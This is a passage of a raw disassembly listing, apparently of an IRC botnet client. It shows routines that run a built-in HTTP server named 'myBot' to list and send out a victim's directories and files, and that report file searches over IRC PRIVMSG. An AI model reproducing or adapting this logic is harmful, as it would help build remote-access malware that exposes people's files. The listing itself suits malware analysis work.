loc_405E06: ; CODE XREF: sub_405AF2+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_405E50
lea eax, [ebp+var_134]
loc_405E12: ; CODE XREF: sub_405AF2+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_405E23
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405E12
jmp short loc_405E53
; ---------------------------------------------------------------------------
loc_405E23: ; CODE XREF: sub_405AF2+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405E47
lea eax, [ebp+ecx*4+var_134]
loc_405E31: ; CODE XREF: sub_405AF2+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405E31
loc_405E47: ; CODE XREF: sub_405AF2+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_405E53
; ---------------------------------------------------------------------------
loc_405E50: ; CODE XREF: sub_405AF2+318�j
mov esi, [ebp+var_4]
loc_405E53: ; CODE XREF: sub_405AF2+32F�j
; sub_405AF2+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_405EBC
lea eax, [ebp+var_360]
push eax
call sub_417AB0
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_417AB0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_405EBC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call ds:dword_43AE34 ;; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_4060D0
add esp, 14h
jmp short loc_405EC3
; ---------------------------------------------------------------------------
loc_405EBC: ; CODE XREF: sub_405AF2+369�j
; sub_405AF2+38F�j
push esi
call ds:dword_43AE30 ;; closesocket
loc_405EC3: ; CODE XREF: sub_405AF2+11D�j
; sub_405AF2+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_405BFF
jmp loc_405BC9
; ---------------------------------------------------------------------------
loc_405ED8: ; CODE XREF: sub_405AF2+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_405EDD: ; CODE XREF: sub_405AF2+6A�j
; sub_405AF2+92�j ...
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_42A36C
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_405F23
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40D679
add esp, 14h
loc_405F23: ; CODE XREF: sub_405AF2+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
push [ebp+var_254]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_405AF2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F4D proc near ; DATA XREF: sub_4060D0+24D�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_417B30
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax
lea eax, [ebp+var_654]
push eax
call sub_4172B0
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_405FB3
push offset aTextHtml ; "text/html"
jmp short loc_405FB8
; ---------------------------------------------------------------------------
loc_405FB3: ; CODE XREF: sub_405F4D+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_405FB8: ; CODE XREF: sub_405F4D+64�j
lea eax, [ebp+var_9C]
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_42409C ;; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_424098 ;; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_406031
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4172B0
add esp, 24h
jmp short loc_406052
; ---------------------------------------------------------------------------
loc_406031: ; CODE XREF: sub_405F4D+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4172B0
add esp, 28h
loc_406052: ; CODE XREF: sub_405F4D+E2�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call ds:dword_43ADE8 ;; send
cmp [ebp+var_A4], edi
jnz short loc_406092
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_406A0D
pop ecx
pop ecx
jmp short loc_4060AF
; ---------------------------------------------------------------------------
loc_406092: ; CODE XREF: sub_405F4D+12D�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_406387
add esp, 10h
loc_4060AF: ; CODE XREF: sub_405F4D+143�j
push [ebp+var_44C]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_B4]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_405F4D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060D0 proc near ; CODE XREF: sub_405AF2+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_417330
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_406106
push eax
push offset aS_4 ; "\\%s"
jmp short loc_40610F
; ---------------------------------------------------------------------------
loc_406106: ; CODE XREF: sub_4060D0+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_3 ; "%s"
loc_40610F: ; CODE XREF: sub_4060D0+34�j
lea eax, [ebp+var_10C]
push eax
call sub_4172B0
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_417AB0
test eax, eax
pop ecx
jbe short loc_4061AA
mov [ebp+arg_8], 2
loc_40613A: ; CODE XREF: sub_4060D0+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_417AB0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_40617A
cmp [ebp+esi+var_10C], 25h
jnz short loc_40617A
cmp [ebp+esi+var_10B], 32h
jnz short loc_40617A
cmp [ebp+esi+var_10A], 30h
jnz short loc_40617A
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_406194
; ---------------------------------------------------------------------------
loc_40617A: ; CODE XREF: sub_4060D0+7A�j
; sub_4060D0+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_40618A
push 5Ch
pop eax
jmp short loc_40618D
; ---------------------------------------------------------------------------
loc_40618A: ; CODE XREF: sub_4060D0+B3�j
movsx eax, al
loc_40618D: ; CODE XREF: sub_4060D0+B8�j
mov [ebp+ebx+var_210], al
loc_406194: ; CODE XREF: sub_4060D0+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_417AB0
cmp esi, eax
pop ecx
jb short loc_40613A
loc_4061AA: ; CODE XREF: sub_4060D0+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4172B0
lea eax, [ebp+var_314]
push offset asc_42A660 ; "\n"
push eax
call sub_418B6E
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:off_4240A8
push 1
cmp eax, 10h
pop esi
jz short loc_4061FB
cmp eax, 0FFFFFFFFh
jnz short loc_4061FE
push [ebp+arg_0]
jmp loc_40627E
; ---------------------------------------------------------------------------
loc_4061FB: ; CODE XREF: sub_4060D0+11C�j
mov [ebp+var_4], esi
loc_4061FE: ; CODE XREF: sub_4060D0+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40620B
mov [ebp+var_4], esi
loc_40620B: ; CODE XREF: sub_4060D0+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_406289
cmp [ebp+arg_C], edi
jz short loc_40627D
lea eax, [ebp+var_314]
push offset asc_42A65C ; "*"
push eax
call sub_4179D0
pop ecx
lea eax, [ebp+var_314]
pop ecx
push eax
lea eax, [ebp+var_640]
push eax
call sub_4172B0
lea eax, [ebp+var_210]
push eax
call sub_406ACA
add esp, 0Ch
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_4172B0
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_4062D8
; ---------------------------------------------------------------------------
loc_40627D: ; CODE XREF: sub_4060D0+152�j
push ebx
loc_40627E: ; CODE XREF: sub_4060D0+126�j
call ds:dword_43AE30 ;; closesocket
jmp loc_406380
; ---------------------------------------------------------------------------
loc_406289: ; CODE XREF: sub_4060D0+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:off_424084
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4062D8
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_4172B0
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:off_4240A4
push esi
mov [ebp+var_330], eax
call ds:off_424078
loc_4062D8: ; CODE XREF: sub_4060D0+1AB�j
; sub_4060D0+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_42A61C
push eax
call sub_4172B0
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_416D5C
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov ds:dword_4407F4[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_405F4D
push edi
push edi
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov ds:dword_440804[ecx], eax
jz short loc_406352
loc_406340: ; CODE XREF: sub_4060D0+280�j
cmp [ebp+var_318], edi
jnz short loc_406380
push 5
call ds:dword_424064 ;; Sleep
jmp short loc_406340
; ---------------------------------------------------------------------------
loc_406352: ; CODE XREF: sub_4060D0+26E�j
push ebx
call ds:dword_43AE30 ;; closesocket
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_42A5D4
push eax
call sub_4172B0
lea eax, [ebp+var_8C4]
push eax
call sub_40BF6D
add esp, 10h
loc_406380: ; CODE XREF: sub_4060D0+1B4�j
; sub_4060D0+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4060D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406387 proc near ; CODE XREF: sub_405F4D+15A�p
; sub_40EE72+49C9�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_417330
mov edi, [ebp+arg_0]
push offset asc_42A660 ; "\n"
push edi
call sub_418B6E
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_4063E6
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41782A
add esp, 14h
jmp loc_4064E5
; ---------------------------------------------------------------------------
loc_4063E6: ; CODE XREF: sub_406387+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_4064CB
call sub_417AB0
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
push edi
call sub_417AB0
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_4064E5
; ---------------------------------------------------------------------------
loc_4064CB: ; CODE XREF: sub_406387+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
loc_4064E5: ; CODE XREF: sub_406387+5A�j
; sub_406387+142�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
cmp [ebp+arg_C], ebx
jz short loc_406580
push [ebp+arg_C]
call sub_417AB0
cmp eax, 2
pop ecx
jbe short loc_406580
push [ebp+arg_C]
call sub_417AB0
sub eax, 3
pop ecx
jz short loc_406531
loc_406525: ; CODE XREF: sub_406387+1A8�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_406531
dec eax
jnz short loc_406525
loc_406531: ; CODE XREF: sub_406387+19C�j
; sub_406387+1A5�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_418C10
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
loc_406580: ; CODE XREF: sub_406387+180�j
; sub_406387+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:off_4240BC
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:off_4240B8
test eax, eax
jz loc_406970
mov edi, 1FFh
loc_4065AC: ; CODE XREF: sub_406387+5E3�j
cmp [ebp+var_388], ebx
jz loc_406958
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_406958
lea eax, [ebp+var_35C]
push offset a_ ; "."
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_406958
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_4240B4 ;; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_4240B0 ;; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_406621
mov ecx, offset aAm ; "AM"
loc_406621: ; CODE XREF: sub_406387+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_40662D
sub eax, 0Ch
loc_40662D: ; CODE XREF: sub_406387+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_4172B0
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4067D0
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_4066A1
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_406919
; ---------------------------------------------------------------------------
loc_4066A1: ; CODE XREF: sub_406387+2E0�j
cmp [ebp+arg_C], ebx
jz loc_40678B
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_0 ; "%s%s/"
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
lea eax, [ebp+var_35C]
push eax
call sub_417AB0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_406741
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_406746
; ---------------------------------------------------------------------------
loc_406741: ; CODE XREF: sub_406387+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_406746: ; CODE XREF: sub_406387+3B8�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40691A
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406387+31D�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 14h
jmp loc_406929
; ---------------------------------------------------------------------------
loc_4067D0: ; CODE XREF: sub_406387+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_40680F
push ebx
push [ebp+var_368]
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi
loc_4067FB: ; CODE XREF: sub_406387+577�j
lea eax, [ebp+var_248]
push eax
call sub_41782A
add esp, 1Ch
jmp loc_406929
; ---------------------------------------------------------------------------
loc_40680F: ; CODE XREF: sub_406387+44F�j
cmp [ebp+arg_C], ebx
jz loc_406903
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_2 ; "%s%s"
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
lea eax, [ebp+var_35C]
push eax
call sub_417AB0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4068AF
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_4068B4
; ---------------------------------------------------------------------------
loc_4068AF: ; CODE XREF: sub_406387+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_4068B4: ; CODE XREF: sub_406387+526�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4067FB
; ---------------------------------------------------------------------------
loc_406903: ; CODE XREF: sub_406387+48B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_406919: ; CODE XREF: sub_406387+315�j
push esi
loc_40691A: ; CODE XREF: sub_406387+3FF�j
lea eax, [ebp+var_248]
push eax
call sub_41782A
add esp, 18h
loc_406929: ; CODE XREF: sub_406387+444�j
; sub_406387+483�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
cmp [ebp+arg_8], ebx
jz short loc_406958
push 7D0h
call ds:dword_424064 ;; Sleep
loc_406958: ; CODE XREF: sub_406387+22B�j
; sub_406387+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:off_4240B8
test eax, eax
jnz loc_4065AC
loc_406970: ; CODE XREF: sub_406387+21A�j
push [ebp+arg_0]
call ds:off_4240AC
cmp [ebp+arg_8], ebx
jz short loc_4069B3
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_4172B0
add esp, 14h
jmp short loc_4069E7
; ---------------------------------------------------------------------------
loc_4069B3: ; CODE XREF: sub_406387+5F5�j
cmp [ebp+arg_C], ebx
jz short loc_4069CD
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_4172B0
pop ecx
pop ecx
jmp short loc_4069E7
; ---------------------------------------------------------------------------
loc_4069CD: ; CODE XREF: sub_406387+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_4172B0
add esp, 10h
loc_4069E7: ; CODE XREF: sub_406387+62A�j
; sub_406387+644�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43ADE8 ;; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406387 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A0D proc near ; CODE XREF: sub_405F4D+13C�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:off_424084
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_406AC5
push esi
push ebx
call ds:off_4240A4
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_406ABE
loc_406A52: ; CODE XREF: sub_406A0D+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_417330
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_406A6F
mov edi, [ebp+arg_4]
loc_406A6F: ; CODE XREF: sub_406A0D+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:off_4240C0
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:off_424074
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_406AB9
call ds:dword_43AD2C ;; WSAGetLastError
cmp eax, 2733h
jnz short loc_406ABE
xor eax, eax
loc_406AB9: ; CODE XREF: sub_406A0D+9B�j
sub [ebp+arg_4], eax
jnz short loc_406A52
loc_406ABE: ; CODE XREF: sub_406A0D+43�j
; sub_406A0D+A8�j
push ebx
call ds:off_424078
loc_406AC5: ; CODE XREF: sub_406A0D+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_406A0D endp
; =============== S U B R O U T I N E =======================================
sub_406ACA proc near ; CODE XREF: sub_4060D0+181�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_417AB0
test eax, eax
pop ecx
jbe short loc_406AF3
loc_406ADD: ; CODE XREF: sub_406ACA+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_406AE7
mov byte ptr [esi+edi], 2Fh
loc_406AE7: ; CODE XREF: sub_406ACA+17�j
push edi
inc esi
call sub_417AB0
cmp esi, eax
pop ecx
jb short loc_406ADD
loc_406AF3: ; CODE XREF: sub_406ACA+11�j
mov eax, edi
pop edi
pop esi
retn
sub_406ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AF8 proc near ; CODE XREF: sub_40EE72+2BE6�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
